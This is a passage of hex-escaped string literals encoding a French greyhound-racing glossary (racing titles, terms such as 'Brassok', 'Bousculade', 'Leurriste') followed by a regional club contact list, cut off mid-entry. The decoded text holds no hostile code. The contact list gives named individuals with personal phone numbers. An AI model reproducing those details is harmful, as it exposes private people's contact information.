+"\x75\x66\x66\x69\x73\x65\x6e\x74\x20\x65\x6e\x20\x63\x6f\x75\x72" +"\x73\x65\x20\xe0\x20\x75\x6e\x20\x74\x69\x74\x75\x6c\x61\x69\x72" +"\x65\x20\x64\x65\x20\x32\x20\x43\x41\x43\x49\x42\x2e\x0d\x0d\x50" +"\x6f\x75\x72\x73\x75\x69\x74\x65\x3a\x0d\x09\x4c\x65\x73\x20\x6c" +"\xe9\x76\x72\x69\x65\x72\x73\x20\x64\x6f\x69\x76\x65\x6e\x74\x20" +"\x61\x76\x6f\x69\x72\x20\x6f\x62\x74\x65\x6e\x75\x20\x6c\x65\x73" +"\x20\x6d\xea\x6d\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73" +"\x20\x65\x6e\x20\x42\x65\x61\x75\x74\xe9\x20\x71\x75\x65\x20\x63" +"\x69\x2d\x64\x65\x73\x73\x75\x73\x2c\x20\x69\x6c\x73\x20\x64\x65" +"\x76\x72\x6f\x6e\x74\x20\x65\x6e\x20\x6f\x75\x74\x72\x65\x20\x61" +"\x76\x6f\x69\x72\x20\x61\x75\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20" +"\x64\x65\x75\x78\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20" +"\x65\x6e\x20\x50\x56\x4c\x20\x61\x69\x6e\x73\x69\x20\x71\x75\x27" +"\x75\x6e\x20\x63\x68\x72\x6f\x6e\x6f\x6d\xe9\x74\x72\x61\x67\x65" +"\x20\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x71\x75\x27\x69\x6c" +"\x73\x20\x6f\x6e\x74\x20\x65\x66\x66\x65\x63\x74\x75\xe9\x20\x75" +"\x6e\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x41\x20\x73\x75\x72" +"\x20\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x37\x35\x20\x6d\xe8\x74" 
+"\x72\x65\x73\x2e\x0d\x0d\x4d\x69\x78\x74\x65\x3a\x0d\x09\x4c\x65" +"\x20\x74\x69\x74\x72\x65\x20\x70\x6f\x75\x72\x72\x61\x20\xea\x74" +"\x72\x65\x20\x6f\x62\x74\x65\x6e\x75\x20\x61\x76\x65\x63\x20\x64" +"\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e\x20" +"\x45\x4e\x43\x20\x65\x74\x20\x65\x6e\x20\x50\x56\x4c\x2e\x0d\x0d" +"\x09\x47\x72\x61\x6e\x64\x20\x50\x72\x69\x78\x20\x64\x65\x20\x6c" +"\x61\x20\x53\x43\x43\x20\x3a\x20\x0d\x43\x6f\x75\x72\x73\x65\x20" +"\x72\xe9\x73\x65\x72\x76\xe9\x65\x20\x61\x75\x78\x20\x6c\xe9\x76" +"\x72\x69\x65\x72\x73\x20\x74\x69\x74\x75\x6c\x61\x69\x72\x65\x73" +"\x20\x64\x65\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e" +"\x20\x65\x78\x70\x6f\x73\x69\x74\x69\x6f\x6e\x73\x20\x61\x76\x65" +"\x63\x20\x61\x75\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x52\x43\x41" +"\x43\x53\x20\x2b\x20\x75\x6e\x20\x65\x78\x63\x65\x6c\x6c\x65\x6e" +"\x74\x2c\x20\x61\x69\x6e\x73\x69\x20\x71\x75\x92\x75\x6e\x20\x65" +"\x78\x63\x65\x6c\x6c\x65\x6e\x74\x20\x6f\x75\x20\x64\x65\x75\x78" +"\x20\x74\x72\xe8\x73\x20\x62\x6f\x6e\x20\x65\x6e\x20\x45\x4e\x43" +"\x2e\x20\x4c\x61\x20\x76\x69\x63\x74\x6f\x69\x72\x65\x20\x65\x73" +"\x74\x20\x70\x6f\x72\x74\xe9\x65\x20\x61\x75\x20\x70\x65\x64\x69" +"\x67\x72\x65\x65\x20\x28\x47\x50\x58\x29\x2e\x20\x0d\x0d\x09\x43" +"\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x27\x45\x75\x72" +"\x6f\x70\x65\x20\x65\x74\x20\x64\x75\x20\x4d\x6f\x6e\x64\x65\x20" +"\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x20\x3a\x0d\x4f\x72\x67\x61" +"\x6e\x69\x73\x61\x74\x69\x6f\x6e\x20\x61\x6e\x6e\x75\x65\x6c\x6c" +"\x65\x20\x64\x65\x20\x6c\x61\x20\x63\x6f\x6e\x66\x72\x6f\x6e\x74" +"\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x6d\x65\x69\x6c\x6c\x65" +"\x75\x72\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73\x20\x73\xe9\x6c" +"\x65\x63\x74\x69\x6f\x6e\x6e\xe9\x73\x20\x70\x61\x72\x20\x63\x68" +"\x61\x71\x75\x65\x20\x70\x61\x79\x73\x20\x6d\x65\x6d\x62\x72\x65" +"\x2c\x20\x70\x61\x72\x20\x72\x61\x63\x65\x20\x65\x74\x20\x70\x61" 
+"\x72\x20\x73\x65\x78\x65\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69" +"\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x46\x72\x61\x6e\x63\x65\x20" +"\x64\x65\x20\x50\x56\x4c\x20\x3a\x0d\x45\x70\x72\x65\x75\x76\x65" +"\x20\x72\xe9\x63\x6f\x6d\x70\x65\x6e\x73\x61\x6e\x74\x20\x6c\x65" +"\x20\x6d\x65\x69\x6c\x6c\x65\x75\x72\x20\x6c\xe9\x76\x72\x69\x65" +"\x72\x20\xe4\x6e\x20\x45\x50\x56\x4c\x2c\x20\x63\x68\x61\x71\x75" +"\x65\x20\x61\x6e\x6e\xe9\x65\x2e\x0d\x0d\x09\x42\x72\x61\x73\x73" +"\x6f\x6b\x20\x3a\x20\x0d\x50\x6c\x6f\x6e\x67\x65\x6f\x6e\x20\x64" +"\x75\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x73\x75\x72\x20\x6c\x65" +"\x20\x6c\x65\x75\x72\x72\x65\x20\xe0\x20\x6c\x27\x61\x72\x72\x69" +"\x76\xe9\x65\x2c\x20\x72\x61\x70\x70\x65\x6c\x61\x6e\x74\x20\x6c" +"\x61\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20\x65\x6d\x70\x6c" +"\x6f\x79\xe9\x65\x20\x70\x6f\x75\x72\x20\x74\x75\x65\x72\x20\x75" +"\x6e\x20\x61\x70\x70\xe2\x74\x20\x76\x69\x76\x61\x6e\x74\x2e\x0d" +"\x0d\x09\x41\x74\x74\x61\x71\x75\x65\x20\x3a\x0d\x4d\x6f\x75\x76" +"\x65\x6d\x65\x6e\x74\x20\x64\x75\x20\x6c\xe9\x76\x72\x69\x65\x72" +"\x20\x76\x65\x72\x73\x20\x75\x6e\x20\x63\x6f\x6e\x63\x75\x72\x72" +"\x65\x6e\x74\x2c\x20\x61\x75\x20\x63\x6f\x75\x72\x73\x20\x64\x75" +"\x71\x75\x65\x6c\x20\x6c\x65\x20\x66\x61\x75\x74\x69\x66\x20\x71" +"\x75\x69\x74\x74\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20" +"\x64\x65\x73\x20\x79\x65\x75\x78\x2e\x20\x4c\x27\x61\x74\x74\x61" +"\x71\x75\x65\x20\x6e\x65\x20\x73\x69\x67\x6e\x69\x66\x69\x65\x20" +"\x6e\x75\x6c\x6c\x65\x6d\x65\x6e\x74\x20\x75\x6e\x65\x20\x76\x6f" +"\x6c\x6f\x6e\x74\xe9\x20\x61\x67\x72\x65\x73\x73\x69\x76\x65\x2c" +"\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x64\x75\x20\x6a\x65\x75\x2e" +"\x0d\x0d\x09\x42\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x20\x3a\x0d" +"\x4d\x6f\x75\x76\x65\x6d\x65\x6e\x74\x20\x64\x75\x20\x6c\xe9\x76" +"\x72\x69\x65\x72\x20\x71\x75\x69\x20\x73\x61\x6e\x73\x20\x71\x75" +"\x69\x74\x74\x65\x72\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20" 
+"\x64\x65\x73\x20\x79\x65\x75\x78\x20\x65\x73\x74\x20\x64\xe9\x70" +"\x6f\x72\x74\xe9\x20\x6f\x75\x20\x73\x65\x20\x66\x61\x69\x74\x20" +"\x64\x65\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x20\xe0\x20\x63\x6f" +"\x75\x70\x73\x20\x64\x27\xe9\x70\x61\x75\x6c\x65\x20\x6f\x75\x20" +"\x64\x65\x20\x68\x61\x6e\x63\x68\x65\x2e\x20\x4c\x61\x20\x62\x6f" +"\x75\x73\x63\x75\x6c\x61\x64\x65\x20\x6e\x27\x65\x73\x74\x20\x70" +"\x61\x73\x20\x75\x6e\x20\x61\x63\x74\x65\x20\x66\x61\x75\x74\x69" +"\x66\x2c\x20\x6d\xea\x6d\x65\x20\x73\x69\x20\x65\x6c\x6c\x65\x20" +"\x70\x72\x6f\x76\x6f\x71\x75\x65\x20\x6c\x61\x20\x63\x68\x75\x74" +"\x65\x20\x64\x75\x20\x62\x6f\x75\x73\x63\x75\x6c\xe9\x2e\x0d\x0d" +"\x09\x4f\x75\x76\x72\x65\x75\x72\x20\x3a\x0d\x4c\xe9\x76\x72\x69" +"\x65\x72\x20\x6e\x6f\x6e\x20\x65\x6e\x67\x61\x67\xe9\x20\x71\x75" +"\x69\x20\x6f\x75\x76\x72\x65\x20\x6c\x61\x20\x72\xe9\x75\x6e\x69" +"\x6f\x6e\x20\x70\x6f\x75\x72\x20\x76\xe9\x72\x69\x66\x69\x63\x61" +"\x74\x69\x6f\x6e\x20\x64\x75\x20\x6d\x61\x74\xe9\x72\x69\x65\x6c" +"\x2e\x0d\x0d\x09\x4f\x62\x73\x65\x72\x76\x61\x74\x65\x75\x72\x73" +"\x20\x64\x65\x20\x76\x69\x72\x61\x67\x65\x20\x3a\x0d\x41\x6e\x63" +"\x69\x65\x6e\x6e\x65\x6d\x65\x6e\x74\x20\x43\x6f\x6d\x6d\x69\x73" +"\x73\x61\x69\x72\x65\x2e\x0d\x50\x65\x72\x73\x6f\x6e\x6e\x65\x20" +"\x61\x67\x72\xe9\xe9\x65\x20\x70\x61\x72\x20\x6c\x61\x20\x43\x2e" +"\x4c\x2e\x20\x70\x61\x72\x6d\x69\x20\x64\x65\x73\x20\x70\x72\x6f" +"\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x73\x20\x65\x78\x70\xe9\x72" +"\x69\x6d\x65\x6e\x74\xe9\x73\x20\x65\x74\x20\x71\x75\x69\x20\x73" +"\x65\x20\x70\x6c\x61\x63\x65\x20\xe0\x20\x63\x68\x61\x71\x75\x65" +"\x20\x76\x69\x72\x61\x67\x65\x73\x20\x70\x6f\x75\x72\x20\x64\x6f" +"\x6e\x6e\x65\x72\x20\x73\x6f\x6e\x20\x61\x76\x69\x73\x20\x73\x75" +"\x72\x20\x6c\x65\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e" +"\x74\x20\x64\x75\x20\x6c\xe9\x76\x72\x69\x65\x72\x2e\x20\x4c\x65" +"\x20\x6a\x75\x67\x65\x20\x65\x73\x74\x20\x6c\x69\x62\x72\x65\x20" 
+"\x64\x65\x20\x73\x75\x69\x76\x72\x65\x20\x6f\x75\x20\x6e\x6f\x6e" +"\x20\x73\x6f\x6e\x20\x61\x76\x69\x73\x20\x28\x63\x6f\x6d\x6d\x65" +"\x20\x6c\x65\x20\x6a\x75\x67\x65\x20\x64\x65\x20\x74\x6f\x75\x63" +"\x68\x65\x20\x65\x6e\x20\x66\x6f\x6f\x74\x62\x61\x6c\x6c\x20\x6f" +"\x75\x20\x65\x6e\x20\x72\x75\x67\x62\x79\x29\x2e\x0d\x51\x75\x61" +"\x6e\x64\x20\x69\x6c\x20\x61\x20\x76\x75\x20\x75\x6e\x65\x20\x66" +"\x61\x75\x74\x65\x2c\x20\x69\x6c\x20\x6c\xe8\x76\x65\x20\x6c\x65" +"\x20\x62\x72\x61\x73\x20\x6f\x75\x20\x75\x6e\x20\x66\x61\x6e\x69" +"\x6f\x6e\x2e\x20\x0d\x0d\x09\x50\x61\x64\x64\x6f\x63\x6b\x3a\x20" +"\x0d\x5a\x6f\x6e\x65\x20\x64\xe9\x6c\x69\x6d\x69\x74\xe9\x65\x20" +"\x70\x61\x72\x20\x64\x65\x73\x20\x63\x6f\x72\x64\x61\x67\x65\x73" +"\x20\x57\xf9\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73" +"\x20\x73\x6f\x6e\x74\x20\x73\x6f\x75\x6d\x69\x73\x20\x61\x75\x78" +"\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x73\x20\x74\x65\x63\x68\x6e" +"\x69\x71\x75\x65\x73\x20\x65\x74\x20\x61\x74\x74\x65\x6e\x64\x65" +"\x6e\x74\x20\x6c\x27\x6f\x72\x64\x72\x65\x20\x64\x27\x61\x6c\x6c" +"\x65\x72\x20\x61\x75\x78\x20\x62\x6f\x69\x74\x65\x73\x20\x64\x65" +"\x20\x64\xe9\x70\x61\x72\x74\x2e\x0d\x0d\x09\x53\x74\x61\x72\x74" +"\x65\x72\x3a\x0d\x50\x65\x72\x73\x6f\x6e\x6e\x65\x20\x71\x75\x69" +"\x20\x64\x6f\x6e\x6e\x65\x20\x6c\x65\x20\x64\xe9\x70\x61\x72\x74" +"\x20\x65\x6e\x20\x6f\x75\x76\x72\x61\x6e\x74\x20\x6c\x65\x73\x20" +"\x62\x6f\x69\x74\x65\x2e\x0d\x0d\x09\x4c\x65\x75\x72\x72\x69\x73" +"\x74\x65\x3a\x0d\x52\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20" +"\x64\x65\x20\x6c\x61\x20\x63\x6f\x6e\x64\x75\x69\x74\x65\x20\x64" +"\x75\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x6e\x20\x52\x61\x63\x69" +"\x6e\x67\x2e\x0d\x0d\x09\x43\x6f\x6e\x64\x75\x63\x74\x65\x75\x72" +"\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20\x3a\x0d\x52\x65\x73" +"\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20\x64\x65\x20\x6c\x61\x20\x63" +"\x6f\x6e\x64\x75\x69\x74\x65\x20\x64\x75\x20\x6c\x65\x75\x72\x72" 
+"\x65\x20\x65\x6e\x20\x45\x2e\x50\x2e\x56\x2e\x4c\x2e\x20\x0d\x53" +"\x6f\x6e\x20\x72\xf4\x6c\x65\x20\x65\x73\x74\x20\x63\x6f\x6e\x73" +"\x69\x64\xe9\x72\x61\x62\x6c\x65\x20\x65\x74\x20\x6c\x65\x73\x20" +"\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x64\x65\x20\x6e\x6f" +"\x6d\x69\x6e\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x70\x6c\x75\x73" +"\x20\x65\x6e\x20\x70\x6c\x75\x73\x20\x73\xe9\x76\xe8\x72\x65\x73" +"\x2e\x0d\x0d\x09\x41\x6d\x69\x63\x61\x6c\x65\x3a\x0d\x45\x70\x72" +"\x65\x75\x76\x65\x20\x6e\x6f\x6e\x2d\x6f\x66\x66\x69\x63\x69\x65" +"\x6c\x6c\x65\x20\x6f\x72\x67\x61\x6e\x69\x73\xe9\x65\x20\x70\x61" +"\x72\x20\x75\x6e\x20\x63\x6c\x75\x62\x20\x61\x67\x72\xe9\xe9\x20" +"\x73\x65\x6c\x6f\x6e\x20\x73\x6f\x6e\x20\x70\x72\x6f\x70\x72\x65" +"\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x20\x65\x74\x20\x70\x6f" +"\x75\x76\x61\x6e\x74\x20\xea\x74\x72\x65\x20\x64\x6f\x74\xe9\x65" +"\xa2\x64\x65\x20\x70\x72\x69\x78\x20\x65\x6e\x20\x65\x73\x70\xe8" +"\x63\x65\x73\x2e\x20\x4c\x61\x20\x73\x65\x75\x6c\x65\x20\x63\x6f" +"\x6e\x74\x72\x61\x69\x6e\x74\x65\x20\x65\x73\x74\x20\x64\x27\x69" +"\x6e\x66\x6f\x72\x6d\x65\x72\x20\x6c\x61\x20\x43\x2e\x4c\x2e\x20" +"\x65\x74\x20\x6c\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20\x43\x61" +"\x6e\x69\x6e\x65\x20\x6c\x6f\x63\x61\x6c\x65\x2e\x20\x4f\x6e\x20" +"\x6e\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x20\x6f\x72\x67\x61" +"\x6e\x69\x73\x65\x72\x20\x64\x27\x61\x6d\x69\x63\x61\x6c\x65\x20" +"\x6c\x65\x20\x6a\x6f\x75\x72\x20\x64\x27\x75\x6e\x65\x20\xe9\x70" +"\x72\x65\x75\x76\x65\x20\x70\x72\x6f\x74\xe9\x67\xe9\x65\x20\x6f" +"\x75\x20\xff\x27\x69\x6c\x20\x79\x20\x61\x20\x20\x72\x69\x73\x71" +"\x75\x65\x20\x64\x65\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63" +"\x65\x72\x20\x75\x6e\x65\x20\xe9\x70\x72\x65\x75\x76\x65\x20\x6f" +"\x66\x66\x69\x63\x69\x65\x6c\x6c\x65\x2e\x0d\x0d\x09\x54\x72\x6f" +"\x70\x68\xe9\x65\x2c\x20\x44\x65\x72\x62\x79\x2e\x2e\x2e\x0d\x41" +"\x70\x70\x65\x6c\x6c\x61\x74\x69\x6f\x6e\x73\x20\x70\x72\x6f\x70" 
+"\x72\x65\x73\x20\xe0\x20\x75\x6e\x65\x20\x61\x6d\x69\x63\x61\x6c" +"\x65\x20\x64\x65\x20\x43\x6c\x75\x62\x20\x6f\x75\x20\x64\x65\x20" +"\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x73\x20\x70\x6f" +"\x75\x72\x20\x6d\x69\x65\x75\x78\x20\x72\x65\x74\x65\x6e\x69\x72" +"\x20\x6c\x27\x61\x74\x74\x65\x6e\x74\x69\x6f\x6e\x2e\x0d\x0d\x09" +"\x53\x75\x73\x70\x65\x6e\x73\x69\x6f\x6e\x3a\x0d\x46\x61\x75\x74" +"\x65\x20\x6c\xe9\x67\xe8\x72\x65\x20\x70\x61\x72\x20\x6d\x61\x6e" +"\x71\x75\x65\x20\x64\x27\x61\x72\x64\x65\x75\x72\x2e\x0d\x0d\x09" +"\x44\x69\x73\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e" +"\x3a\x0d\x46\x61\x75\x74\x65\x20\x67\x72\x61\x76\x65\x20\x6e\x75" +"\x69\x73\x61\x6e\x74\x20\xe0\x20\x61\x75\x74\x72\x75\x69\x20\x65" +"\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74\x65\x20\x70\x61\x72\x20" +"\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x2e\x0d\x0d\x09" +"\x43\x68\x61\x75\x76\x69\x6e\x69\x73\x6d\x65\x3a\x0d\x56\x6f\x74" +"\x72\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x6e\x65\x20\x73\x65" +"\x72\x61\x20\x70\x61\x73\x20\x66\x6f\x72\x63\x65\x6d\x65\x6e\x74" +"\x20\x6c\x65\x20\x70\x6c\x75\x73\x20\x72\x61\x70\x69\x64\x65\x2c" +"\x20\x6d\x61\x69\x73\x20\x70\x6f\x75\x72\x20\x76\x6f\x75\x73\x2c" +"\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x6c\x65\x20\x70\x6c\x75\x73" +"\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x2c\x20\x6c\x65" +"\x20\x70\x6c\x75\x73\x20\x62\x65\x61\x75\x2c\x20\x6c\x65\x20\x70" +"\x6c\x75\x73\x20\x67\x65\x6e\x74\x69\x6c\x2e\x20\x4e\x27\x61\x64" +"\x6d\x65\x74\x74\x65\x7a\x20\x70\x61\x73\x20\x71\x75\x27\x6f\x6e" +"\x20\x6c\x65\x20\x64\xe9\x6e\x69\x67\x72\x65\x2c\x20\x70\x61\x73" +"\x20\x70\x6c\x75\x73\x20\x71\x75\x65\x20\x73\x6f\x6e\x20\xe9\x6c" +"\x65\x76\x65\x75\x72\x20\x6f\x75\x20\x73\x6f\x6e\x20\x63\x6c\x75" +"\x62\x2e\x20\x4e\x65\x20\x6c\x65\x20\x66\x61\x69\x74\x65\x73\x20" +"\x70\x61\x73\x20\x70\x6f\x75\x72\x20\x6c\x65\x73\x20\x61\x75\x74" +"\x72\x65\x73\x2e\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d" 
+"\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d" +"\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x41\x20\x71\x75\x69" +"\x20\x76\x6f\x75\x73\x20\x61\x64\x72\x65\x73\x73\x65\x72\x20\x3f" +"\x0d\x50\x6f\x75\x72\x20\x74\x6f\x75\x74\x20\x72\x65\x6e\x73\x65" +"\x69\x67\x6e\x65\x6d\x65\x6e\x74\x20\x74\x65\x63\x68\x6e\x69\x71" +"\x75\x65\x20\x6f\x75\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61" +"\x74\x69\x66\x20\x3a\x09\x41\x20\x76\x6f\x74\x72\x65\x20\x63\x6c" +"\x75\x62\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x61\x67" +"\x72\xe9\xe9\x20\x3a\x0d\x0d\x36\x38\x07\x41\x4c\x53\x41\x43\x45" +"\x07\x4d\x6d\x65\x20\x53\x63\x68\x65\x72\x72\x65\x72\x07\x30\x33" +"\x2e\x38\x39\x2e\x34\x30\x2e\x35\x39\x2e\x31\x30\x07\x42\x65\x74" +"\x74\x65\x6e\x64\x6f\x72\x66\x07\x50\x56\x4c\x07\x07\x37\x36\x07" +"\x41\x43\x43\x4c\x07\x4d\x2e\x20\x47\x61\x72\x72\x61\x75\x6c\x74" +"\x07\x30\x32\x2e\x33\x35\x2e\x34\x34\x2e\x38\x31\x2e\x36\x33\x07" +"\x4d\x61\x6e\x6e\x65\x76\x69\x6c\x65\x74\x74\x65\x07\x45\x4e\x43" +"\x07\x07\x36\x36\x07\x41\x43\x4c\x53\x07\x4d\x6d\x65\x20\x4d\x61" +"\x73\x61\x6e\x61\x07\x30\x34\x2e\x36\x38\x2e\x39\x32\x2e\x37\x32" +"\x2e\x34\x30\x07\x50\x65\x72\x70\x69\x67\x6e\x61\x6e\x07\x50\x56" +"\x4c\x20\x2b\x20\x45\x4e\x43\x07\x07\x31\x32\x07\x41\x43\x4c\x41" +"\x43\x54\x41\x07\x4d\x2e\x20\x47\x61\x79\x72\x61\x72\x64\x07\x30" +"\x35\x2e\x36\x35\x2e\x36\x33\x2e\x33\x36\x2e\x33\x32\x07\x43\x72" +"\x61\x6e\x73\x61\x63\x20\x6c\x65\x73\x20\x54\x65\x72\x6d\x65\x73" +"\x07\x45\x4e\x43\x07\x07\x39\x34\x07\x41\x53\x4c\x4c\x07\x4d\x6d" +"\x65\x20\x41\x6e\x73\x61\x6c\x64\x69\x20\x4a\x61\x63\x71\x75\x65" +"\x74\x07\x30\x31\x2e\x36\x39\x2e\x33\x31\x2e\x30\x35\x2e\x36\x39" +"\x07\x4e\x65\x75\x69\x6c\x6c\x79\x20\x73\x75\x72\x20\x4d\x61\x72" +"\x6e\x65\x07\x45\x6e\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e\x74\x73" +"\x07\x07\x39\x30\x07\x43\x43\x43\x07\x4d\x6d\x65\x20\x4c\x69\x6e" +"\x64\x65\x6b\x65\x72\x07\x30\x33\x2e\x38\x34\x2e\x32\x39\x2e\x30" 
+"\x31\x2e\x37\x31\x07\x42\x65\x6c\x66\x6f\x72\x74\x07\x37\x56\x4c" +"\x07\x07\x34\x34\x07\x43\x43\x43\x41\x07\x4d\x2e\x20\x4d\x61\x67" +"\x72\xe9\x07\x30\x32\x2e\x34\x30\x2e\x38\x38\x2e\x38\x39\x2e\x38" +"\x38\x07\x48\x65\x72\x62\x69\x67\x6e\x61\x63\x07\x50\x56\x4c\x07" +"\x07\x37\x31\x07\x43\x43\x4c\x42\x07\x4d\x2e\x20\x42\x6f\x75\x72" +"\x61\x73\x73\x65\x74\x07\x30\x34\x2e\x37\x34\x2e\x35\x35\x2e\x31" +"\x33\x2e\x30\x34\x07\x4d\xe2\x63\x6f\x6e\x07\x50\x56\x4c\x07\x07" +"\x32\x36\x07\x43\x43\x4c\x56\x07\x4d\x6c\x6c\x65\x20\x4c\x6f\x6d" +"\x62\x61\x72\x64\x07\x30\x34\x2e\x37\x35\x2e\x38\x33\x2e\x37\x32" +"\x2e\x38\x32\x07\x56\x61\x6c\x65\x6e\x63\x65\x07\x45\x6e\x74\x72" +"\x61\x69\x6e\x74\x73\x20\x50\x56\x4c\x07\x07\x31\x36\x07\x43\x45" +"\x19\x43\x07\x4d\x6d\x65\x20\x4c\x61\x6c\x65\x6d\x65\x6e\x64\x07" +"\x30\x35\x2e\x34\x35\x2e\x36\x37\x2e\x39\x35\x2e\x38\x31\x07\x4d" +"\x61\x6e\x73\x6c\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x32" +"\x39\x07\x43\x4c\x41\x4d\x07\x4d\x2e\x20\x4c\x65\x67\x75\x65\x73" +"\x67\x75\x65\x07\x30\x32\x2e\x39\x38\x2e\x37\x32\x2e\x34\x34\x2e" +"\x34\x32\x07\x4d\x6f\x72\x6c\x61\x69\x78\x07\x50\x56\x4c\x07\x07" +"\x33\x33\x07\x43\x4c\x43\x07\x4d\x6c\x6c\x65\x20\x4d\x6f\x6e\x69" +"\x6f\x74\x07\x30\x36\x2e\x30\x37\x2e\x33\x37\x2e\x37\x33\x2e\x31" +"\x39\x07\x53\x74\x20\x44\x65\x6e\x69\x73\x20\x64\x65\x20\x50\x69" +"\x6c\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x36\x32\x07\x43" +"\x4c\x43\x41\x07\x4d\x2e\x20\x42\x65\x6e\x6f\x69\x74\x07\x30\x33" +"\x2e\x32\x31\x2e\x31\x32\x2e\x37\x30\x2e\x33\x30\x07\x41\x69\x72" +"\x20\x73\x2f\x4c\x79\x73\x07\x45\x4e\x43\x07\x07\x37\x38\x07\x43" +"\x4c\x43\x49\x46\x07\x4d\x2e\x20\x4c\x65\x66\xe8\x76\x72\x65\x07" +"\x30\x32\x2e\x33\x32\x2e\x33\x38\x2e\x34\x36\x2e\x32\x33\x07\x4d" +"\x65\x75\x6c\x61\x6e\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x34" +"\x30\x07\x43\x55\x4c\x43\x4c\x07\x4d\x2e\x20\x4c\x75\x63\x61\x6e" +"\x74\x6f\x6e\x69\x6f\x07\x30\x35\x2e\x36\x32\x2e\x34\x35\x2e\x30" 
+"\x33\x2e\x35\x31\x07\x4d\x6f\x6e\x74\x20\x64\x65\x20\x4d\x61\x72" +"\x73\x61\x6e\x07\x45\x4e\x43\x2b\x45\x6e\x74\x72\x2e\x50\x56\x4c" +"\x07\x07\x37\x32\x07\x43\x4c\x43\x4d\x07\x4d\x2e\x20\x46\x65\x6c" +"\x64\x65\x72\x07\x30\x36\x2e\x38\x32\x2e\x33\x39\x2e\x37\x32\x2e" +"\x36\x35\x07\x50\x61\x72\x69\x67\x6e\xe9\x20\x6c\x27\x45\x76\xea" +"\x71\x75\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x33\x38\x07" +"\x43\x4c\x44\x53\x07\x4d\x6d\x65\x20\x43\x61\x69\x6c\x6c\x61\x74" +"\x07\x30\x34\x2e\x37\x36\x2e\x36\x38\x2e\x32\x39\x2e\x39\x35\x07" +"\x56\x69\x7a\x69\x6c\x6c\x65\x07\x50\x56\x4c\x07\x07\x37\x37\x07" +"\x43\x4c\x43\x42\x07\x4d\x6d\x65\x20\x50\x61\x69\x6c\x6c\x65\x74" +"\x07\x30\x31\x2e\x36\x34\x2e\x30\x36\x2e\x36\x38\x2e\x31\x34\x07" +"\x4c\x69\x76\x65\x72\x64\x79\x07\x45\x4e\x43\x07\x07\x33\x37\x07" +"\x43\x4c\x53\x54\x07\x4d\x6c\x6c\x65\x20\x4d\x61\x73\x73\x61\x07" +"\x30\x32\x2e\x34\x37\x2e\x39\x34\x2e\x37\x38\x2e\x38\x32\x07\x54" +"\x6f\x75\x72\x73\x07\x50\x56\x4c\x07\x07\x37\x32\x07\x43\x4c\x55" +"\x42\x07\x4d\x2e\x20\x46\x65\x75\x76\x72\x69\x65\x72\x07\x30\x32" +"\x2e\x34\x33\x2e\x32\x30\x2e\x35\x36\x2e\x32\x36\x07\x4c\x61\x20" +"\x43\x68\x61\x70\x65\x6c\x6c\x65\x20\x53\x74\x20\x46\x72\x61\x79" +"\x07\x50\x56\x4c\x07\x07\x33\x31\x07\x43\x4c\x4d\x50\x07\x4d\x2e" +"\x20\x4d\x61\x67\x72\x65\x74\x07\x30\x35\x20\x36\x33\x20\x32\x36" +"\x20\x34\x33\x20\x30\x38\x07\x4d\x6f\x6e\x74\x61\x75\x62\x61\x6e" +"\x07\x45\x4e\x43\x07\x07\x36\x33\x07\x43\x4c\x53\x43\x41\x42\x07" 